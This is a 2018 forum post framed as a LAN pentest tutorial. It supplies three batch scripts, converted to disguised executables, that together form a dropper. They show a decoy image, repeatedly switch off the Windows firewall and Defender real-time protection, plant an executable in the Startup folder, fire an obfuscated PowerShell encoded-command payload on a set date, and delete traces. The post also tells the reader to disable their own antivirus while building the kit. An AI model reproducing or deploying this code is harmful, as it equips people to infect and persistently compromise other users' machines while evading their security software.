Learn About Computers

Teaching about Computers


    23. Lan Pentest Preparing Payload With Windows 7

    Share

    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    23. Lan Pentest Preparing Payload With Windows 7

    Post by Aof on Sun May 27, 2018 10:46 pm


    23. Lan Pentest Preparing Payload With Windows 7
    ----
    Lan & Wlan Pentests, A Closer look at preparing the Payloads, 3 Bat Files Commands are explained within the video.
    af.bat Contents & Rem comments Explaination of Commands.
    =*=

    Code:
    @echo off
    Rem Turns off Echo
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    Rem starts command prompt in minimized mode,
    Rem this command probably isn't necessary,
    Rem since we will make the entire thing invisible later
    Rem but why not?
    taskkill /im f1.exe /f
    Rem kill process f1.exe forcefully.
    timeout /t 01 > nul
    Rem waits 1 second, without printing anything with nul.
    start "" "%appdata%\zombie.png"
    Rem starts a program or file, in this case a picture.
    netsh advfirewall set allprofiles state off 2> nul
    Rem sets Windows 10 firewall to off if this
    Rem Program is ran in Administrator Mode.
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    Rem Disable Window's Defender Realtime Protection
    timeout /t 10 > nul
    Rem waits 10 seconds, repeat.
    Rem If the program is not ran as administrator
    Rem This portion will just print an error, but
    Rem since it's set to Nul, it shouldn't print anything.
    Rem Besides, we will make this entire thing invisible
    Rem so nothing seems to matters, it's just extra notes.
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    Rem After approximately 1 minute and 40 seconds of
    Rem Repeatedly disabling protection
    "%appdata%\f1.exe" 2> nul
    Rem Starts "f1.exe" silently from within this actual
    Rem Command Prompt Window.
    Rem there is no start command before it,
    Rem so this program is done running from this point
    Rem and it should not be able to run any commands below
    Rem this point.
    exit
    Rem just incase it did run anything else,
    Rem it will exit itself.


    f1.bat Contents & Rem comments Explaination of Commands.
    =*=

    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    Rem turns echo off, kills payload's
    Rem process, powershell.exe if it's running.
    timeout /t 02
    Rem waits 2 seconds
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    Rem Moves f.exe to the User's startup's folder.
    :Begin
    Rem Beginning Block
    set t=%date:~4,5%
    Rem Set's the variable "t" to the current date of the pc
    if "%t%"=="03/02" goto :A
    Rem if the date matches 3 month and 2 day goto block A.
    if not "%t%"=="03/02" goto :B
    Rem if doesn't match 3 month and 2 day goto block B.
    timeout /t 02 > nul
    Rem Waits 2 seconds
    :A
    Rem Beginning of Block A.
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    Rem start Payload.
    :B
    Rem Beginning of Block B.
    timeout /t 05
    Rem Waits 5 seconds.
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    Rem starts f.exe
    timeout /t 05
    Rem Waits 5 seconds, program will exit itself after
    Rem Completing all commands.
    [/b][/size][/color]

    [color=#000000][size=16][b][color=#0000FF]f.bat[/color] Contents & Rem comments Explaination of Commands.
    =*=[/b][/size][/color]
    [color=#000000][size=16][b]Rem Turns echo off.
    taskkill /im f1.exe /f 2> nul
    Rem kills the process f1.exe forcefully, to nul
    Rem so it doesn't print anything when it kills it.
    taskkill /im powershell.exe /f
    Rem kills powershell.exe forcefully.
    timeout /t 04 > nul
    Rem waits 4 seconds.
    del "%appdata%\f1.exe" /q /s /f 2> nul
    Rem deletes f1.exe which is the payload .exe


    I prefer to use Windows 7 vs. Windows 10 to prepare the Payload.
    1. Search windows for Microsoft Security Essentials (That's my Virus Protector within the video.) Set your real-time protection to Off.
    2. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = Open the Command Prompt, enter the follwing command which will kill your gui explorer, kill Microsoft security essentials process, then restart your gui file explorer.
    3. Plug in your Usb stick with the Payload on it.
    4. I have the 3 .bat files code contents in this forum post, under the "code" sections, find the 3 .bat files I use in the video, then follow the instructions within the video carefully. Below are each of the .bat file contents, and the names I named it within the video.
    5. You will need your own payload, your own icon file, and your own zombie.PNG image in order to use the below files for a Pentest on your own machine.
    6. Keep in mind for the exe files that I created, the 1 exe that runs for administrator is for Windows 10, and the one that runs without administrator priviledges is for Windows 7.

    af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work however for 32-bit windows 7 systems.
    =*=

    Code:
    @echo off
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    taskkill /im f1.exe /f
    timeout /t 01 > nul
    start "" "%appdata%\zombie.png"
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    "%appdata%\f1.exe" 2> nul
    exit


    f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.
    =*=

    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    timeout /t 02
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    :Begin
    set t=%date:~4,5%
    if "%t%"=="03/02" goto :A
    if not "%t%"=="03/02" goto :B
    timeout /t 02 > nul
    :A
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    :B
    timeout /t 05
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    timeout /t 05


    f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.
    =*=

    Code:
    @echo off
    taskkill /im f1.exe /f 2> nul
    taskkill /im powershell.exe /f
    timeout /t 04 > nul
    del "%appdata%\f1.exe" /q /s /f 2> nul




    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    Re: 23. Lan Pentest Preparing Payload With Windows 7

    Post by Aof on Sun May 27, 2018 11:02 pm

    http://www.majorgeeks.com/files/details/bat_to_exe_converter.html
    Bat to Exe Converter Download Link

    mediafire.com/file/lljfw7si9crtwrb/bjim.zip
    Big J Icon Maker Download Link copy & Paste in your browser above Also it should be noted that any Icon Maker should work, you don't have to use this one.

      Current date/time is Sun Dec 16, 2018 9:39 pm